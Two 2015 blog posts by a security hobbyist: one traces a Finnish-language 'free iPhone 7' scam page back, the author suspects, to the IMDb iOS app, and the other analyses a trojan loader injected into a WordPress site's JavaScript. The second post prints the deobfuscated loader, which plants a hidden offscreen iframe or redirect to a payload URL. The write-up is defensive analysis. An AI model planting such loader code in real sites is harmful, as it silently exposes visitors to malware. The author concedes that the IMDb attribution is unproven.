Apple iPhone 7 giveaway scam
Wednesday, November 18. 2015
Looks like I'm on a roll. I was home watching a movie and while at it, I got interested about an actor in it and his other work in TV. In normal situation, I'd just flip open one of my laptops, but none were at arm's reach. However, my iPad was. For any movie buff like me, the one an only definite site is Internet Movie Database, or IMDb. Their mobile site is pretty good, but I wanted to give their iOS app a go.
The Incident
I installed the app, and went to iOS Safari to google something, which I don't even remember anymore. Pretty much when I opened the Safari something really weird happened (unfortunately for most of the readers, all of this is in Finnish):
My iPad was selected out of 20 Finnish ones, to get a free iPhone 7 in 2016 when it will be released. WTF!!? For a split second, I - a seasoned software security professional, thought "wow, I'm must be really lucky!" Then the experience kicked in: "This is a scam!" At that point I started taking screenshots of everything I saw on the iPad screen.
Once I got rid of the modal alert-box, there were four bogus questions of "Do you own an Apple product?" and about the future features the iPhone 7 should have and the final one about "Do you have an address in Finland which can be used to deliver your iPhone 7?":
After those, there was a fake "check" for eligibility and a smooth transition to customer testimonials page:
The language was horrible all the way. Finnish is a tricky language for anybody else to master in a believable manner. For example the month name "Elvember" doesn't mean anything in Finnish.
Finally, when I clicked the large blue "yes, gimme my free gift" -button, I ended up in even weirder page asking my personal information:
At this point I lost interest. I have no clue, that's their end game and what they would be using my information for, but I simply didn't want to even enter any fake info there.
Question 4 about address may point to some sort of smuggling scam, so that the unfortunate address would be used to send some sort of contraband which the criminals would liberate from mailbox before nobody notices. I have no proof of that happening.
The Injection
At this point, the relevant question was: What the hell happened?
Where did that page arrive into my Safari? Isn't iOS supposed to be the safest mobile OS there is? Is it really that easy to get past security? What did I do wrong to allow this to happen?
The good thing with this was that I was running in my own Wi-Fi. There I have a basic setup to keep me informed what's going on, so to the logfiles I went:
- 18.11.2015 18:22:13: App Store was started, lot of requests made to load data and graphics for it
- 18.11.2015 18:22:18: A search was made to App Store, it was me searching for "imdb"
- 18.11.2015 18:22:49: 14,801,031 bytes were downloaded from Apple's cloud, that was me downloading the IMDb app
- 18.11.2015 18:23:05: Lot of traffic into various resources to initialize the loaded app. Partial list of sites:
- - iPad configuration in JSON-format from IMDb
- - Market research company
- - Amazon, Inc. advertisement system, they own IMDb
- - Image server for IMDb
- - Unknown IMDb server
- - Unknown IMDb server
- - Unknown Apple server
- - Unknown Amazon server
- 18.11.2015 18:24:43: Safari was launched,
- was loaded
- 18.11.2015 18:29:35: Questions were completed
- - start of redirecting
- - middle point
- - personal information form
- done
IMDb app pulled in some garbage and triggered the page load into my Safari. Unbelievable!
If you want to study my movements, here is the logfile:
I have omitted the IPv6 address of my iPad, it will be displayed as 2001::87b4, which is obviously not the address.
Motive and opportunity has already been explained, when it comes to means, the Objective-C code to open a page in iOS Safari from an app would be a single line:
[[UIApplication sharedApplication] openURL:[NSURL URLWithString: [@""]]];
In my opinion an outside threat is not feasible, this had to be an inside job.
The Facts
A simple kick into Google search engine revealed for example Possible Iphone 7 Scam at Apple discussions. This has been going on since July 2015, at least, possibly earlier.
The page I was forced to go was
Couple of queries for the DNS and ICANN whois:
# host is an alias for has address has address
Registrant Contact
Name: Registration Private
Organization: Domains By Proxy, LLC
At the HTML-source of the, the redirect to the personal information form is at, but the actual form is at, a Danish domain. Querying for those:
# host is an alias for has address has address
# host has address
# host has address mail is handled by 10 mail is handled by 100
Registrant Contact
Name: Registration Private
Organization: Domains By Proxy, LLC
Registrant Contact
Name: H Pieters
Organization: Your Product In Mind
Domain name:
Status: Active
Created: 2007/11/07
Userid: FA7610-DK
Address: Skibbrogade 3, 2.
Zipcode & City: 9000 Aalborg
Country: Danmark
Phone: +4588888484
IP-address owners:
# geoiplookup
GeoIP Country Edition: IE, Ireland
GeoIP City Edition, Rev 1: IE, 07, Dublin, Dublin, N/A, 53.333099, -6.248900, 0, 0
GeoIP ASNum Edition: AS16509, Inc.
# geoiplookup
GeoIP Country Edition: US, United States
GeoIP City Edition, Rev 1: US, CA, California, Newport Beach, 92663, 33.626701, -117.931198, 803, 949
GeoIP ASNum Edition: AS19994 Rackspace Hosting
# geoiplookup
GeoIP Country Edition: IE, Ireland
GeoIP City Edition, Rev 1: IE, N/A, N/A, N/A, N/A, 53.347801, -6.259700, 0, 0
GeoIP ASNum Edition: AS8075 Microsoft Corporation
Conclusions: services are running in Ireland, Amazon and Microsoft data centers and Rackspace, California. Domains are hidden behind proxies so, that the real owners of the domains are hidden. Even the Danish one is proxy-owned. About the Dutch one registered to Rotterdam, I'm not sure, that could be a real one. They use it only for redirect, maybe because they don't want to burn that so soon.
The Outcome
For the record, I'm talking about IMDb app version 6.3.1:
And there was no way, I was letting that piece of garbage pop up any more stupid questionnaires:
... the app needed to go. I didn't trust it for a second.
As I can almost hear you screaming already: "But you didn't prove, that it was the IMDb app! All of this is merely a coincidencee".
Sure, that's true. Even with my debugging skills, looking exactly at an app and tracing it in detail would take a very long time. Which in this case I didn't do. However, my proof is in the fact, that I haven't installed any apps for weeks. My Safari didn't display that stupid questionnaire page earier that day, but after installing and running the IMDb app, it did. I'm sure nobody really knows what the app loads and executes, I have proven, that it consumes a lot of data through network.
Also, I'm not a big believeer of coincidences:
Mycroft: “Oh Sherlock. What do we say about coincidence?”
Sherlock: “The universe is rarely so lazy.”
... there really aren't any.
Unfortunate encounter with Trojan.JS.Agent.KX
Tuesday, November 17. 2015
I was surfing the other day, and suddenly ding-ding-ding, a warning! I wasn't looking for trouble, but trouble found me, again.
That box makes appearances rarely, but typically I know about it's going to happen. This time I didn't expect that. The site I went to was just a regular one, not one that in any normal circumstances would raise any red flags. My automatic second thought was "a false positive", but there it was:
Based on the scanning reports, it looks like all of the static JavaScript files on that site were infected. A closer look into a file:
function null_check() {
var e = "none";
if ("none" != e) {
var t = document.getElementById(e);
void 0 != typeof t && null != t && (t.outerHTML = "", delete t)
function browser_version_check() {
return document.all && !document.compatMode ? !0 :
document.all && !window.XMLHttpRequest ? !0 :
document.all && !document.querySelector ? !0 :
document.all && !document.addEventListener ? !0 :
document.all && !window.atob ? !0 :
document.all ? !0 :
"undefined" != typeof navigator.maxTouchPoints &&
!document.all &&
ie_check() ? !0 : !1
function ie_check() {
var e = window.navigator.userAgent,
t = e.indexOf("MSIE ");
if (t > 0) return parseInt(e.substring(t + 5, e.indexOf(".", t)), 10);
var i = e.indexOf("Trident/");
if (i > 0) {
var n = e.indexOf("rv:");
return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10)
var o = e.indexOf("Edge/");
return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1
function user_agent_check() {
var e = window.navigator.userAgent.toLowerCase();
return /(android|bb\d+|meego).+mobile|/i.test(e.substr(0, 4)) ? !0 : !1
var intervalTimer = setInterval(function() {
if (null != document.body && "undefined" != typeof document.body) {
if (clearInterval(intervalTimer), "undefined" == typeof window.loaded_into_this_window) {
window.loaded_into_this_window = 1;
var e = ie_check() && browser_version_check(),
t = !e && !! && "Google Inc." === window.navigator.vendor,
i = -1,
n = "";
if (user_agent_check() && 1 == i)
navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ?
location.replace(n) : (window.location = n, document.location = n);
else if (e && !t && !user_agent_check()) {
var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' +
n + '" height="10px"></iframe></div>',
a = document.getElementsByTagName("div");
if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o;
else {
var d = a.length,
r = Math.floor(d / 2);
a[r].innerHTML = a[r].innerHTML + o
}, 100);
Quite simple piece of code. It was heavily packed, so I beautified it and renamed the obfuscated function names and variables. The regexp for user agent detection was a mile long, so I shortened it by about 2000 characters. Anyway, the basic functionality of the code is to create a timer for 100 milliseconds, which when triggered on a non-mobile client create a hidden IFRAME 3532 pixels left of the user agent's viewport containing web page from ... which to my disappointment was already taken down. So, I didn't get to see what the actual payload was. The above code is only a loader, a means to lure the actual trojan into your box. I guess it would contain some sort of exploit in it, but as I said: some nice person already took that domain down.
How the trojan loader was injected was a no-brainer. A simple HTTP-request for /readme.html indicated, that the site was running WordPress 4.3.1, which at the time of investigating was the latest stable release. The server is running a Debian 6, a way outdated Linux distro released in February 2011 reaching end-of-life in couple of months. The thing is: Wordpress is a leaky bucket having constant flow of security alerts. Also, I know for a fact, that Debian 6 also has couple of holes here and there. So, points of entry are available for those automated bots injecting the loaders.
Anyway, I ended my investigation happy. My own box reacted as it should and the threat had been taken down already. Also the site in question was taken off-line in a couple of hours after me filing an abuse report to their ISP. All was good for a brief time ... until next incident occurs.